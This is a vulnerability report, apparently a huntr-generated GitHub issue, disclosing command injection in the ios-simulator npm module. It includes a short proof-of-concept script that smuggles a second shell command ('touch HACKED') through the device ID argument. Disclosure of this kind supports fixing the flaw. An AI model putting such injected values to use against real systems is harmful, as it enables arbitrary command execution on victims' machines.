ios-simulator
ios-simulator copied to clipboard
huntr - RCE via insecure command formatting (Command Injection)
This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)
Details
I would like to report a RCE
issue in the ios-simulator
module.
It allows to execute arbitrary commands remotely inside the victim's PC
Vulnerability Description
The issue occurs because a user input
is formatted inside a command
that will be executed without any check. The issue arises here: https://github.com/macacajs/ios-simulator/blob/master/lib/ios-simulator.js#L50
Steps To Reproduce:
- Create the following PoC file:
// poc.js
var ios = require('ios-simulator');
ios.prototype.setDeviceId('test"; touch HACKED; #');
ios.prototype.install();
- Check there aren't files called
HACKED
- Execute the following commands in another terminal:
npm i ios-simulator # Install affected module
node poc.js # Run the PoC
- Recheck the files: now
HACKED
has been created :)
Bug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/